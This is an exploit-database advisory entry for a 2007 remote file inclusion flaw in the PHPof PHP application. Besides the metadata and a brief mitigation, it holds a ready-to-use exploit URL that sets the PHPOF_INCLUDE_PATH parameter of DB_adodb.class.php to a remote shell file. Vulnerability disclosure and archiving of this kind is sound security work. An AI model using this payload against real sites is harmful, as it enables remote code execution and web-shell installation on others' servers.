header-logo
Suggest Exploit
vendor:
PHPof
by:
ThE TiGeR
5.5
CVSS
MEDIUM
Remote file inclusion
CWE
Product Name: PHPof
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Phpof Remote file inclusion

This exploit allows an attacker to include arbitrary files from a remote server in the PHPof application. By manipulating the 'PHPOF_INCLUDE_PATH' parameter in the 'DB_adodb.class.php' file, an attacker can include a shell.txt file from a remote server.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate file paths before including them in PHP code.
Source

Exploit-DB raw data:

#Phpof Remote file inclusion

#Download script : http://www.phpof.org/phpof-20040226.tar.bz2

#Thx Str0ke

#Exploit :

#http://victime.com/[phpof_path]/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=shell.txt?

#Discoverd by ThE TiGeR

#Miro_Tiger100[at]Hotmail.com

# milw0rm.com [2007-09-04]

Navigation

Suggest Exploit

Services By CQR